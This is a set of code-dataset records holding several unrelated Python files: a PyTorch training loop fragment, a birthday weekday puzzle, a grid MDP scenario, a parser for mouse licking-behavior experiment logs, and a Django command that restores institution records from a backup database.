torch.from_numpy(b_y).type(torch.int64)\n\n\t# show_break()\n\t# print(type(b_x), type(b_y), b_x.shape, b_y.shape)\n\n\toutput = net(b_x)\n\tloss = loss_func(output, b_y)\n\tloss_count += loss.data.numpy()\n\n\toptimizer.zero_grad()\n\tloss.backward()\n\toptimizer.step()\n\n\tif (i+1) % 10 == 0:\n\n\t\tacc = cal_acc(output.data.numpy(), b_y.data.numpy())\n\t\tprint('Epoch: %d | loss: %.4f | acc: %.4f' % (i, loss_count/10, acc))\n\t\tloss_count = 0\n\t\tsave_model(net, save_path=save_path)\n\t\tprint('Save Model Successfully!')\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"LHY-ML/hw4-Text Sentiment 
Classification(RNN)/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212356056","text":"def dayOfWeek(birthdayDate):\n m, d, y = [int(x) for x in birthdayDate.split('-')]\n\n Day = 0\n yp = y\n\n def checkLeap(year):\n if ((year % 4 == 0) and (year % 100 != 0)) or (year % 400 == 0):\n return True\n else:\n False\n\n if (d == 29) and (m == 2):\n while not (Day % 7 == 0 and Day > 0 and checkLeap(yp)):\n yp += 4\n if checkLeap(yp):\n Day += 5\n else:\n Day += 4\n\n return yp - y\n\n if m < 3:\n beforeLeap = True\n else:\n beforeLeap = False\n\n while not (Day % 7 == 0 and Day > 0):\n yp += 1\n if (checkLeap(yp - 1) and beforeLeap) or (checkLeap(yp) and (not beforeLeap)):\n Day += 2\n else:\n Day += 1\n\n return yp - y\n\n\nbirthdayDate = \"02-29-2016\"\n\nprint(dayOfWeek(birthdayDate))\n","sub_path":"Day_of_Week.py","file_name":"Day_of_Week.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419048895","text":"from collections import namedtuple\n\nfrom mdp.distribution import Distribution\nfrom mdp.scenario import Scenario\nfrom mdp.state import State\nfrom mdp.action import Action, JointActionSpace\n\nGridParams = namedtuple('GridParams', ['x', 'y', 'w', 'h', 'rounds'])\nparams = GridParams(5, 5, 10, 10, 11)\nagent_name = 'Howie'\n\n\ndef initial_state():\n return State({'x': 0, 'y': 0, 'Round': 0})\n\n\ndef actions(state):\n \"\"\"Returns legal actions in the state.\"\"\"\n legal_actions = []\n\n if state['x'] > 0:\n legal_actions += ['left']\n if state['x'] < params.w:\n legal_actions += ['right']\n if state['y'] > 0:\n legal_actions += ['down']\n if state['y'] < params.h:\n legal_actions += ['up']\n\n return JointActionSpace({agent_name: legal_actions})\n\n\ndef transition(state, action):\n new_state_dict = dict(state.copy())\n\n act_str = action[agent_name]\n if act_str is 'right':\n new_state_dict['x'] += 1\n elif act_str is 'left':\n new_state_dict['x'] += -1\n elif act_str is 'up':\n new_state_dict['y'] += 1\n elif act_str is 'down':\n new_state_dict['y'] += -1\n\n new_state_dict['Round'] += 1\n\n return Distribution({State(new_state_dict): 1}) # a list of all possible outcomes and their associated probabilities\n\n\ndef end(state):\n return state['Round'] == params.rounds or (state['x'] == params.x and state['y'] == params.y)\n\n\ndef utility(old_state, action, new_state):\n \"\"\"\n Returns utility associated with given state.\n \"\"\"\n return int(new_state['x'] == params.x and new_state['y'] == params.y)* 0.9**(new_state['Round'])\n\n\ngrid_scenario = Scenario(initial_state=initial_state, actions=actions,\n transition=transition, utility=utility, end=end)\n","sub_path":"domains/single_agent/grid/grid_scenario.py","file_name":"grid_scenario.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"525888255","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\n this script is used for_double_delayed_c_reward in 2020.07 !!!!!\n\"\"\"\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nimport os\nimport random\nimport matplotlib as mpl\nimport re\nimport csv\nimport pickle\n\n\n#%%\nclass Mouse_data:\n def __init__(self,mouse_id,filedir):\n self.mouse_id = mouse_id\n 
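# mouse_id names the animal; filedir is the directory whose
        # /<mouse_id> subfolder read_filename() walks for per-day .xlsx logs.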
self.filedir = filedir\n self.filename = ''\n self.selected_filename = ''\n self.all_days = []\n \n self.training_type = []\n self.df_trials = {}\n self.trialtypes = []\n self.df_trials_iscorrect = {}\n self.df_trials_lick = {}\n self.df_eventcode = {}\n self.p_hit = {}\n self.p_correj = {}\n self.licking_actionwindow = {}\n self.licking_latency = {}\n self.licking_baselicking = {}\n self.stats = {}\n self.event_data = ''\n self.odor_bef = 3.0\n self.odor_on = 1.0\n self.delay = 2.5\n self.rew_after = 2\n \n\n def read_filename(self):\n filedir = self.filedir +'/{}'.format(self.mouse_id)\n filename = []\n for dirpath, dirnames, files in os.walk(filedir): # can walk through all levels down\n # print(f'Found directory: {dirpath}')\n for f_name in files:\n if f_name.endswith('.xlsx'):\n filename.append(dirpath+'/'+f_name)\n print(f_name)\n print('---------------------------------------------') \n print('The files have been loaded from the following paths')\n print(filename[-45:])\n self.filename = filename\n \n \n def select_dates(self):\n pass\n def delete_date(self, dates):\n for date in dates:\n self.all_days.remove(date)\n \n return self.all_days\n \n def create_eventcode(self, original = True): #{'date':df of eventcode} format from original CSV\n date_list = []\n df = {}\n training_type = []\n \n for file in self.filename:\n date = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2}-\\d{1,2}-\\d{1,2})\",file).group(0) # extract date: must be like format 2020-02-10\n date_list.append(date) # create a list of emperiment date\n \n train_type = os.path.split(file)[-1][16:-5]\n training_type.append(train_type) ###\n \n \n data = pd.read_excel(file,header = 0 if original else None) #read orginal csv data\n data.columns = ['Time','Event','Type'] # rename columns\n \n df.update({date:data}) # create the dict of key: date and value: data dataframe\n self.df_eventcode = df #individual mouse event code data\n date_format = '%Y-%m-%d-%h-%s'\n index = np.argsort(date_list)\n self.all_days = [date_list[i] for i in index]\n self.training_type = [training_type[i] for i in index]\n \n print('---------------------------------------------')\n print('{0} has data from these days: {1}'.format(self.mouse_id,zip(self.all_days,self.training_type)))\n\n def create_trials(self): #{'date: df of trials}\n for index , date in enumerate(self.all_days):\n value = self.df_eventcode[date]\n \n new_df = self.generate_trials_dataframe(index,value)\n self.df_trials[date] = new_df\n print('{} done!'.format(date))\n \n \n def generate_trials_dataframe(self,index,ori_df):\n \n lick, trialtype, go_odor, nogo_odor, control_odor, water_on, water_off, trial_end = self.seperate_events(index,ori_df)\n d = {'trialtype' : trialtype, 'go_odor': go_odor, 'nogo_odor': nogo_odor, 'control_odor':control_odor,\n 'water_on':water_on,'water_off':water_off,'licking':lick,\n 'trial_end':trial_end}\n df_trial = pd.DataFrame(data = d)\n return df_trial\n \n \n def seperate_events(self,index_day,df):\n \n start_trials = 0\n lick = []\n trialtype = []\n go_odor = []\n nogo_odor = []\n control_odor = []\n water_on = []\n water_off = []\n trial_end = []\n print(index_day)\n \n for index, row in df.iterrows():\n if row['Event'] == 101: # trial start\n start_trials = row['Time'] \n temp_licks = []\n temp_go_odor_on = np.nan\n temp_go_odor_off = np.nan\n temp_nogo_odor_on = np.nan\n temp_nogo_odor_off = np.nan\n temp_control_odor_on = np.nan\n temp_control_odor_off = np.nan\n \n temp_water_on = np.nan\n temp_water_off = np.nan\n temp_trial_end = np.nan\n \n if 
row['Type'] == 'trial0':\n trialtype.append('go')\n elif row['Type'] == 'trial1':\n trialtype.append('no_go')\n elif row['Type'] == 'trial2':\n trialtype.append('background')\n elif row['Type'] == 'trial3':\n trialtype.append('go_omit')\n elif row['Type'] == 'trial4':\n trialtype.append('unpred_water')\n elif row['Type'] == 'trial5':\n trialtype.append('c_reward')\n elif row['Type'] == 'trial6':\n trialtype.append('c_omit')\n elif row['Type'] == 'trial7':\n trialtype.append('close_unpred_water')\n elif row['Type'] == 'trial8':\n trialtype.append('far_unpred_water')\n\n elif row['Event'] == 11:\n lick_time = row['Time'] - start_trials\n temp_licks.append(lick_time)\n\n elif row['Event'] == 131: # go odor on\n temp_go_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 130:\n temp_go_odor_off=row['Time']- start_trials\n\n elif row['Event'] == 141: # no go odor on\n temp_nogo_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 140:\n temp_nogo_odor_off=row['Time']- start_trials\n elif row['Event'] == 161: # no go odor on\n temp_control_odor_on=row['Time']- start_trials\n \n elif row['Event'] == 160:\n temp_control_odor_off=row['Time']- start_trials\n \n elif row['Event'] == 51: # water on\n temp_water_on=row['Time']- start_trials\n \n elif row['Event'] == 50:\n temp_water_off=row['Time']- start_trials\n\n elif row['Event'] == 100: #trial end\n temp_trial_end=row['Time']- start_trials\n \n lick.append(temp_licks)\n go_odor.append([temp_go_odor_on,temp_go_odor_off])\n \n nogo_odor.append([temp_nogo_odor_on,temp_nogo_odor_off])\n control_odor.append([temp_control_odor_on,temp_control_odor_off])\n water_on.append(temp_water_on)\n water_off.append(temp_water_off)\n trial_end.append(temp_trial_end)\n \n \n return lick, trialtype, go_odor, nogo_odor, control_odor, water_on, water_off, trial_end\n \n def create_trial_iscorrect(self): # create dataframe with trial number, correct or rewarded or not only for conditioning period\n for index , date in enumerate(self.all_days): \n value = self.df_trials[date]\n new_df = self.eval_trials_correct(value)\n new_df.insert(0,'trialtype',value['trialtype'])\n self.df_trials_iscorrect[date] = new_df\n print('create_trial_iscorrect done!')\n \n def eval_trials_correct(self, df):\n \n is_correct = []\n is_rewarded = []\n for index, row in df.iterrows():\n if row['trialtype'] == 'go':\n is_rewarded.append(1)\n if any(x > row['go_odor'][0] and x < row['go_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n \n elif row['trialtype'] == 'no_go':\n is_rewarded.append(0)\n if any(x > row['nogo_odor'][0] and x < row['nogo_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(0)\n else:\n is_correct.append(1)\n \n elif row['trialtype'] == 'c_reward':\n is_rewarded.append(1)\n if any(x > row['control_odor'][0] and x < row['water_on'] for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n elif row['trialtype'] == 'c_omit':\n is_rewarded.append(0)\n if any(x > row['control_odor'][0] and x < row['control_odor'][1]+2*self.delay for x in row['licking']):\n is_correct.append(1)\n else:\n is_correct.append(0)\n \n elif row['trialtype'] == 'background':\n is_rewarded.append(0)\n if any(x > 0 and x < row['trial_end'] for x in row['licking']):\n is_correct.append(0)\n else:\n is_correct.append(1)\n \n elif row['trialtype'] == 'go_omit':\n is_rewarded.append(0)\n if any(x > row['go_odor'][0] and x < row['go_odor'][1]+self.delay for x in row['licking']):\n is_correct.append(1)\n 
else:\n is_correct.append(0)\n elif row['trialtype'] in ['unpred_water','close_unpred_water','far_unpred_water']:\n is_rewarded.append(1)\n is_correct.append(np.nan)\n d = {'is_Correct':is_correct,'is_Rewarded':is_rewarded}\n new_df = pd.DataFrame(d)\n return new_df\n \n def create_trial_lick(self):\n for index , date in enumerate(self.all_days):\n value = self.df_trials[date] \n new_df = self.lick_stats(value) \n new_df.insert(0,'trialtype',value['trialtype'])\n self.df_trials_lick[date] = new_df\n print('lick stats done!') \n \n def lick_stats(self, df):\n \n lick_num = []\n lick_rate = []\n lick_latent_odor = []\n lick_latent_rew = []\n lick_duration = []\n lick_rate_anti = []\n lick_rate_aftr = []\n tol_interval = self.odor_on + self.delay + self.rew_after\n anti_window = self.odor_on + self.delay\n lick_anti_list = []\n lick_aftr_list = []\n for index, row in df.iterrows():\n if row['trialtype'] in ['go','go_omit'] :\n \n lick_valid = [x for x in row['licking'] if x > row['go_odor'][0] and x < row['go_odor'][0]+tol_interval ] # valid licking: after odor on and 5.5 s after odor off\n #lickingrate for anticipitory period and after water period 3.5 respectively\n anti = [i for i in row['licking'] if i> row['go_odor'][0] and i< row['go_odor'][1]+self.delay] #anticipitory\n aftr = [i for i in row['licking'] if i> row['water_on'] and i< row['water_off']+self.rew_after] #after water\n rate_anti = len(anti)/anti_window \n rate_aftr = len(aftr)/self.rew_after \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['go_odor'][0]# first licking after odor delivery on\n else:\n latency_odor = tol_interval\n if row['trialtype'] == 'go':\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after odor delivery on\n else:\n latency_rew = self.rew_after\n else:\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n elif row['trialtype'] == 'no_go':\n lick_valid = [x for x in row['licking'] if x > row['nogo_odor'][0] and x < row['nogo_odor'][0]+tol_interval ] # valid licking: after odor on and 5.5 s after odor off\n #inter-licking interval for anticipitory period and after water period\n anti = [i for i in row['licking'] if i> row['nogo_odor'][0] and i< row['nogo_odor'][1]+self.delay] #anticipitory\n aftr = [] \n rate_anti = len(anti)/anti_window \n rate_aftr = np.nan \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['nogo_odor'][0]# first licking after odor delivery on\n else:\n latency_odor = tol_interval\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n elif row['trialtype'] in ['c_reward','c_omit'] :\n \n lick_valid = [x for x in row['licking'] if x > row['control_odor'][0] and x < row['control_odor'][0]+tol_interval+self.delay ] # valid licking: after odor on and 5.5 s after odor off\n #lickingrate for anticipitory period and after water period 3.5 respectively\n anti = [i for i in row['licking'] if i> row['control_odor'][0] and i< row['water_on']] #anticipitory\n aftr = [i for i in row['licking'] if i> row['water_on'] and i< row['water_off']+self.rew_after] #after water\n rate_anti = len(anti)/(row['water_on']- row['control_odor'][0]) \n rate_aftr = len(aftr)/self.rew_after \n #num of licking\n num = len(lick_valid)\n if num != 0:\n latency_odor = min(lick_valid)-row['control_odor'][0]# 
first licking after odor delivery on\n else:\n latency_odor = row['water_on']- row['control_odor'][0]\n if row['trialtype'] == 'c_reward':\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after odor delivery on\n else:\n latency_rew = self.rew_after\n else:\n latency_rew = np.nan\n try: \n duration = max(anti)-min(anti) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n elif row['trialtype'] == 'background':\n lick_valid = [x for x in row['licking'] if x > 0 and x < row['trial_end']] # valid licking: after odor on and 5.5 s after odor off\n intvl = row['trial_end']\n anti = lick_valid\n aftr = []\n rate_anti = len(anti)/intvl \n rate_aftr = np.nan \n num = len(lick_valid)\n latency_odor = np.nan\n latency_rew = np.nan\n duration = np.nan # licking duration after water delivery\n \n elif row['trialtype'] in ['unpred_water','close_unpred_water','far_unpred_water']:\n lick_valid = [x for x in row['licking'] if x > 0 and x < row['trial_end'] ] # valid licking: after odor on and 5.5 s after odor off \n #inter-licking interval for anticipitory period and after water period\n anti = [i for i in row['licking'] if i> 0 and i< row['water_on']] #anticipitory\n \n aftr = [i for i in row['licking'] if i> row['water_on'] and i < min((row['water_off']+self.rew_after),row['trial_end'])] \n rate_anti = len(anti)/(row['water_on']) \n rate_aftr = len(aftr)/min(self.rew_after,row['trial_end']-row['water_off']) \n #num of licking\n num = len(lick_valid)\n if len(aftr) != 0:\n latency_rew = min(aftr)-row['water_on']# first licking after unpredicted water\n else:\n latency_rew = min(self.rew_after,row['trial_end']-row['water_off'])\n latency_odor = np.nan\n try: \n duration = max(aftr)-min(aftr) # anticipitory licking duration after odor presentation\n except:\n duration = np.nan\n \n \n lick_num.append(num)\n lick_rate.append(num/tol_interval)\n lick_latent_odor.append(latency_odor)\n lick_latent_rew.append(latency_rew)\n lick_duration.append(duration)\n lick_rate_anti.append(rate_anti)\n lick_rate_aftr.append(rate_aftr)\n lick_anti_list.append(anti)\n lick_aftr_list.append(aftr)\n \n d = {'lick_num_whole_trial':lick_num,\n 'lick_rate_whole_trial':lick_rate,\n 'latency_to_odor':lick_latent_odor,\n 'latency_to_rew':lick_latent_rew,\n 'anti_duration':lick_duration,\n 'rate_antici':lick_rate_anti,\n 'rate_after':lick_rate_aftr,\n 'anti_lick':lick_anti_list,\n 'aftr_lick':lick_aftr_list\n }\n new_df = pd.DataFrame(d)\n return new_df\n \n\n \n \ndef save_to_excel(dict_df,path,filename):\n try:\n os.makedirs(path) # create the path first\n except FileExistsError:\n print('the path exist.')\n filename = path +'/{}.xlsx'.format(filename)\n\n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter(filename, engine='xlsxwriter')\n \n # Write each dataframe to a different worksheet. 
you could write different string like above if you want\n for key, value in dict_df.items():\n value.to_excel(writer, sheet_name= key)\n \n \n # Close the Pandas Excel writer and output the Excel file.\n writer.save()\n print('save to excel done!')\n \ndef pickle_dict(df,path,filename):\n try:\n os.makedirs(path) # create the path first\n except FileExistsError:\n print('the path exist.')\n filename = path +'/{}.pickle'.format(filename)\n with open(filename, 'wb') as handle:\n pickle.dump(df, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('save to pickle done!')\n\n\ndef load_pickleddata(filename):\n \n with open(filename, 'rb') as handle:\n df = pickle.load(handle)\n return df\n \n \n\n#def sort_list(list1, list2): \n# \n# zipped_pairs = zip(list2, list1) \n# zipped = list(zipped_pairs) \n# \n# # Printing zipped list \n# print(\"Initial zipped list - \", str(zipped)) \n# \n# date_format = '%Y-%m-%d'\n# z = sorted(zipped,key=lambda date: datetime.strptime(date[1], date_format)) #\n# \n# # printing result \n# print(\"final list - \", str(res)) \n# \n# return z \n\n \n \n\n#%%\n#%% main code\nif __name__ == '__main__':\n \n is_save = True\n is_original = True # when use clean data, change it to False\n \n #********************\n load_path = 'D:/PhD/Behavior/behavior_21_02/close_far_2021_01_Pav/'\n \n # load file\n mouse_names = ['C38','C39','C40']\n # mouse_names = ['D2-04']\n for mouse_name in mouse_names:\n cute = Mouse_data(mouse_name, filedir = load_path)\n cute.read_filename()\n #parse data\n cute.create_eventcode(original = is_original)\n cute.create_trials()\n cute.create_trial_iscorrect() \n cute.create_trial_lick()\n \n \n if is_save:\n #save data by pickle\n #****************\n save_path = load_path+'/parsed_dataframe_pickle'\n \n filename = '{}_stats'.format(cute.mouse_id)\n pickle_dict(cute,save_path,filename)\n \n #save data to excel for just visualization (it'l all turn into string, so cannot be used later.)\n #****************\n save_path_excel = load_path+'/parsed_dataframe_spreadsheet'\n \n save_to_excel(cute.df_trials_iscorrect,save_path_excel,'{}_trial_iscorrect'.format(cute.mouse_id))\n save_to_excel(cute.df_trials_lick,save_path_excel,'{}_lick_stat'.format(cute.mouse_id))\n save_to_excel(cute.df_trials,save_path_excel,'{}_trials'.format(cute.mouse_id))\n save_to_excel(cute.df_eventcode,save_path_excel,'{}_eventcode'.format(cute.mouse_id)) \n#%% main code\nif __name__ == '__main__':\n \n is_save = True\n is_original = False # when use clean data, change it to False\n \n #********************\n load_path = 'D:/PhD/Behavior/behavior_21_01/experiment_data_2021_01_Pav/clean_data/'\n \n # load file\n # mouse_names = ['D1-05-TDT','D2-02','D2-04','D2-05-TDT']\n mouse_names = ['DAT-01']\n for mouse_name in mouse_names:\n cute = Mouse_data(mouse_name, filedir = load_path)\n cute.read_filename()\n #parse data\n cute.create_eventcode(original = is_original)\n cute.create_trials()\n cute.create_trial_iscorrect() \n cute.create_trial_lick()\n \n \n if is_save:\n #save data by pickle\n #****************\n save_path = load_path+'/parsed_dataframe_pickle'\n \n filename = '{}_stats'.format(cute.mouse_id)\n pickle_dict(cute,save_path,filename)\n \n #save data to excel for just visualization (it'l all turn into string, so cannot be used later.)\n #****************\n save_path_excel = load_path+'/parsed_dataframe_spreadsheet'\n \n save_to_excel(cute.df_trials_iscorrect,save_path_excel,'{}_trial_iscorrect'.format(cute.mouse_id))\n 
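`save_to_excel` above wraps `os.makedirs` in try/except and finishes with `writer.save()`, which newer pandas versions removed in favor of closing the writer. A sketch of the same helper under those assumptions (Python 3 for `exist_ok`, a reasonably recent pandas for the context manager):

```python
import os
import pandas as pd

def save_to_excel_v2(dict_df, path, filename):
    os.makedirs(path, exist_ok=True)  # no try/except needed
    target = os.path.join(path, '{}.xlsx'.format(filename))
    with pd.ExcelWriter(target, engine='xlsxwriter') as writer:
        for key, value in dict_df.items():
            # xlsx caps sheet names at 31 characters
            value.to_excel(writer, sheet_name=str(key)[:31])
    print('save to excel done!')
```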
save_to_excel(cute.df_trials_lick,save_path_excel,'{}_lick_stat'.format(cute.mouse_id))\n save_to_excel(cute.df_trials,save_path_excel,'{}_trials'.format(cute.mouse_id))\n save_to_excel(cute.df_eventcode,save_path_excel,'{}_eventcode'.format(cute.mouse_id)) \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"AntCamMS/parse_data_v2.py","file_name":"parse_data_v2.py","file_ext":"py","file_size_in_byte":23123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52634062","text":"#!/usr/bin/env python\n\"\"\"Restores an Institution from \"stars-backup\" database into\n\"default\" db.\n\nAlso restores the Institution's SubmissionSets (and\nSubcategorySubmissions, CategorySubmissions, etc.).\n\nSpecify the Institution to restore by name.\n\n\"\"\"\nfrom django.core.management.base import BaseCommand\n\nfrom ...models import Institution\nfrom stars.apps.credits.models import Rating\nfrom stars.apps.institutions.models import (InstitutionPreferences,\n MigrationHistory,\n RegistrationSurvey,\n RespondentSurvey,\n StarsAccount,\n Subscription)\nfrom stars.apps.submissions.models import (CreditUserSubmission,\n DocumentationFieldSubmission,\n ResponsibleParty,\n SubmissionSet)\nfrom stars.apps.submissions.utils import get_documentation_field_submissions\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n if len(args) == 1:\n restore_institution(name=args[0])\n else:\n print(\"ERROR: No Institution name specified.\")\n print(\"USAGE: manage.py restore_institution \")\n\n\ndef restore_institution(name,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n \"\"\"Restores Institution from `source_db` database to `target_db` db.\n\n You specify the Institution to restore by name.\n\n In addition to an Institution object, related SubmissionSets,\n Subscriptions, ResponsiblePartys, and Ratings are restored.\n SubmissionSets and Subscriptions also restore objects related to\n them.\n\n \"\"\"\n try:\n institution_to_restore = (\n Institution.objects.using(source_db).get(name=name))\n except Institution.DoesNotExist:\n print(\"No Institution in {} db with name {}\".format(source_db, name))\n return\n\n # Restore the Institution.\n print(\"Institution {} restoring\".format(institution_to_restore.pk))\n institution_to_restore.save(using=target_db)\n\n # Restore SubmissionSets.\n submissionsets = Institution.objects.using(\n source_db).get(\n pk=institution_to_restore.pk).submissionset_set.all().order_by(\n \"-pk\")\n\n for submissionset in submissionsets:\n restore_submissionset(submissionset=submissionset,\n source_db=source_db,\n target_db=target_db)\n\n # Restore Subscriptions.\n subscriptions = Subscription.objects.using(source_db).filter(\n institution=institution_to_restore)\n\n for subscription in subscriptions:\n restore_subscription(subscription=subscription,\n source_db=source_db,\n target_db=target_db)\n\n # Restore ResponsiblePartys.\n for responsible_party in ResponsibleParty.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**Responsible Party {} restoring\".format(\n responsible_party.pk))\n responsible_party.save(using=target_db)\n print(\"**Responsible Party {} restored\".format(\n responsible_party.pk))\n\n # Restore StarsAccounts.\n for stars_account in StarsAccount.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**STARS Account {} restoring\".format(stars_account.pk))\n 
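Each related model in `restore_institution` is copied with the same three lines (log, `save(using=target_db)`, log). A hypothetical helper that factors that shape out, a sketch rather than the project's code:

```python
def copy_queryset(queryset, target_db, label):
    """Re-save every object of a source-db queryset into target_db."""
    for obj in queryset:
        print("**{} {} restoring".format(label, obj.pk))
        obj.save(using=target_db)
        print("**{} {} restored".format(label, obj.pk))

# e.g.:
# copy_queryset(MigrationHistory.objects.using(source_db).filter(
#     institution=institution_to_restore), target_db, "MigrationHistory")
```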
stars_account.save(using=target_db)\n print(\"***User {} restoring\".format(stars_account.user.pk))\n stars_account.user.save(using=target_db)\n print(\"***User {} restored\".format(stars_account.user.pk))\n print(\"**STARS Account {} restored\".format(stars_account.pk))\n\n # Restore MigrationHistorys.\n for migration_history in MigrationHistory.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**MigrationHistory {} restoring\".format(migration_history.pk))\n migration_history.save(using=target_db)\n print(\"**MigrationHistory {} restored\".format(migration_history.pk))\n\n # Restore RegistrationSurveys.\n for registration_survey in RegistrationSurvey.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**RegistrationSurvey {} restoring\".format(\n registration_survey.pk))\n registration_survey.save(using=target_db)\n print(\"**RegistrationSurvey {} restored\".format(\n registration_survey.pk))\n\n # Restore RespondentSurveys.\n for respondent_survey in RespondentSurvey.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**RespondentSurvey {} restoring\".format(respondent_survey.pk))\n respondent_survey.save(using=target_db)\n print(\"**RespondentSurvey {} restored\".format(respondent_survey.pk))\n\n # Restore InstitutionPreferences.\n for institution_preference in InstitutionPreferences.objects.using(\n source_db).filter(institution=institution_to_restore):\n print(\"**InstitutionPreference {} restoring\".format(\n institution_preference.pk))\n institution_preference.save(using=target_db)\n print(\"**InstitutionPreference {} restored\".format(\n institution_preference.pk))\n\n print(\"Institution {} restored\".format(institution_to_restore.pk))\n\n\ndef restore_submissionset(submissionset,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n \"\"\"Restores `submissionset` and related CategorySubmissions from\n `source_db` to `target_db`.\n\n \"\"\"\n print(\"*SubmissionSet {} restoring\".format(submissionset.pk))\n date_created = submissionset.date_created\n submissionset.save(using=target_db,\n skip_init_credit_submissions=True)\n submissionset.date_created = date_created\n submissionset.save(using=target_db,\n skip_init_credit_submissions=True)\n\n category_submissions_to_restore = (\n submissionset.categorysubmission_set.using(source_db).all())\n for category_submission in category_submissions_to_restore:\n restore_category_submission(category_submission,\n source_db,\n target_db)\n\n if submissionset.rating_id:\n print(\"**Rating {} restoring\".format(submissionset.rating_id))\n rating = Rating.objects.using(source_db).get(\n submissionset=submissionset)\n rating.save(using=target_db)\n print(\"**Rating {} restored\".format(rating.pk))\n\n print(\"*SubmissionSet {} restored\".format(submissionset.pk))\n\n\ndef restore_category_submission(category_submission, source_db, target_db):\n \"\"\"Restores `category_submission` and all related SubcategorySubmissions.\n \"\"\"\n\n print(\"**CategorySubmission {} restoring\".format(\n category_submission.pk))\n category_submission.save(using=target_db)\n\n subcategory_submissions_to_restore = (\n category_submission.subcategorysubmission_set.using(source_db).all())\n for sub_category_submission in subcategory_submissions_to_restore:\n restore_subcategory_submission(sub_category_submission,\n source_db,\n target_db)\n\n print(\"**CategorySubmission {} restored\".format(\n category_submission.pk))\n\n\ndef 
restore_subcategory_submission(subcategory_submission,\n source_db,\n target_db):\n \"\"\"Restores `subcategory_submission` and all related\n CreditSubmissions.\n\n \"\"\"\n\n print(\"***SubCategorySubmission {} restoring\".format(\n subcategory_submission.pk))\n subcategory_submission.save(using=target_db)\n\n credit_user_submissions_to_restore = (\n subcategory_submission.creditusersubmission_set.using(\n source_db).all())\n for credit_user_submission in credit_user_submissions_to_restore:\n restore_credit_user_submission(credit_user_submission,\n source_db,\n target_db)\n\n print(\"***SubCategorySubmission {} restored\".format(\n subcategory_submission.pk))\n\n\ndef restore_credit_user_submission(credit_user_submission,\n source_db,\n target_db):\n \"\"\"Restores `credit_user_submission` and all related\n DocumentationFieldSubmissions.\n\n \"\"\"\n\n print(\"****CreditUserSubmission {} restoring\".format(\n credit_user_submission.pk))\n credit_user_submission.save(using=target_db,\n calculate_points=False)\n\n credit_user_submission = CreditUserSubmission.objects.using(\n source_db).get(pk=credit_user_submission.pk)\n\n documentation_field_submissions_to_restore = (\n get_documentation_field_submissions(\n credit_user_submission=credit_user_submission,\n source_db=source_db))\n\n for documentation_field_submission in (\n documentation_field_submissions_to_restore):\n\n restore_documentation_field_submission(\n documentation_field_submission=documentation_field_submission,\n source_db=source_db,\n target_db=target_db)\n\n print(\"****CreditUserSubmission {} restored\".format(\n credit_user_submission.pk))\n\n\ndef restore_documentation_field_submission(\n documentation_field_submission,\n source_db,\n target_db):\n\n print(\"*****DocumentationFieldSubmission {} restoring\".format(\n documentation_field_submission.pk))\n\n documentation_field_submission.save(using=target_db)\n\n print(\"*****DocumentationFieldSubmission {} restored\".format(\n documentation_field_submission.pk))\n\n\ndef restore_subscription(subscription,\n source_db,\n target_db):\n \"\"\"Restores `subscription` and all related SubscriptionPayments.\n\n \"\"\"\n\n print(\"****Subscription {} restoring\".format(subscription.pk))\n subscription.save(using=target_db)\n\n for subscription_payment in subscription.subscriptionpayment_set.all():\n print(\"*****SubscriptionPayment {} restoring\".format(\n subscription_payment.pk))\n subscription_payment.save(using=target_db, subscription=subscription)\n print(\"*****SubscriptionPayment {} restored\".format(\n subscription_payment.pk))\n\n print(\"****Subscription {} restored\".format(\n subscription.pk))\n\n\ndef restore_only_document_field_submissions(institution,\n source_db=\"stars-backup\",\n target_db=\"default\"):\n submissionsets = Institution.objects.using(\n source_db).get(\n pk=institution.pk).submissionset_set.all()\n\n for submissionset in submissionsets:\n\n if not SubmissionSet.objects.using(target_db).filter(\n pk=submissionset.pk).count():\n continue\n\n category_submissions_to_restore = (\n submissionset.categorysubmission_set.using(source_db).all())\n for category_submission in category_submissions_to_restore:\n\n subcategory_submissions_to_restore = (\n category_submission.subcategorysubmission_set.using(source_db).all()) # noqa\n for subcategory_submission in subcategory_submissions_to_restore:\n\n credit_user_submissions_to_restore = (\n 